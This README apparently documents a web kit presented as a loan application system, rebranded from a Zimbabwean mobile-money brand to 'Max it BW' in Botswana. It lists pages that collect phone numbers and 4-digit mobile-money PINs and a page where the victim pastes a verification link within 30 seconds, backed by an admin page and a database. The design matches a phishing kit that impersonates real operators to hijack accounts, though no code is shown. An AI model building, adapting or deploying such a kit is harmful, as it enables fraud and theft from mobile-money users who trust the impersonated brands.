# Max it BW - Botswana Loan Application System π§πΌ
This loan application system has been fully rebranded for **Max it BW** (Botswana).
## π Key Changes Made
### Branding Changes
- **Telecel Play** β **Max it BW**
- **Zimbabwe** β **Botswana**
- **Color Scheme**: Orange (#FF6B00) & Blue (#0066CC) theme
### Currency & Financial
- **Currency**: USD (US Dollars) β **P (Pula)** - Botswana's currency
- **Loan Range**: P 500 to P 50,000 (realistic for Botswana market)
- **Interest Rate**: 12% APR (unchanged)
### Contact & Location
- **Phone Code**: +263 (Zimbabwe) β **+267 (Botswana)**
- **Cities**: Gaborone, Francistown, Maun
- **Website**: maxitbw.co.bw
- **Email**: support@maxitbw.co.bw
### π¨ CRITICAL Technical Changes
#### PIN System - 4 DIGITS β
- **Format**: 4-digit PIN (unchanged from original)
- **Reason**: Standard for mobile money
#### VERIFICATION SYSTEM - MAJOR CHANGE β οΈ
- **Previous**: 5-digit OTP code in separate boxes
- **Now**: **Single text box for pasting verification LINK**
- **Timer**: **30 seconds** (changed from 60 seconds)
- **Reason**: Max it BW uses link-based verification instead of numeric codes
#### Phone Number Format
- **Format**: +267 XX XXX XXX
- **Example**: +267 71 123 456
## π Files Included
All files have been fully rebranded:
### HTML Files
- β
`index.html` - Landing page
- β
`application.html` - Loan application form
- β
`verification.html` - 4-digit PIN verification
- β
`otp.html` - **Link verification (30-second timer)** β οΈ MAJOR CHANGE
- β
`approval.html` - Loan approval page
- β
`admin-select.html` - Admin selection
### JavaScript Files
- β
`landing-script.js` - Calculator & interactions (P currency)
- β
`application-script.js` - Form handling
- β
`verification-script.js` - PIN verification logic
- β
`otp-script.js` - **Link handling (30-second timer)** β οΈ MAJOR CHANGE
- β
`approval-script.js` - Approval page logic (P currency)
### Backend Files
- β
`server.js` - Express backend
- β
`database.js` - MongoDB configuratio β¦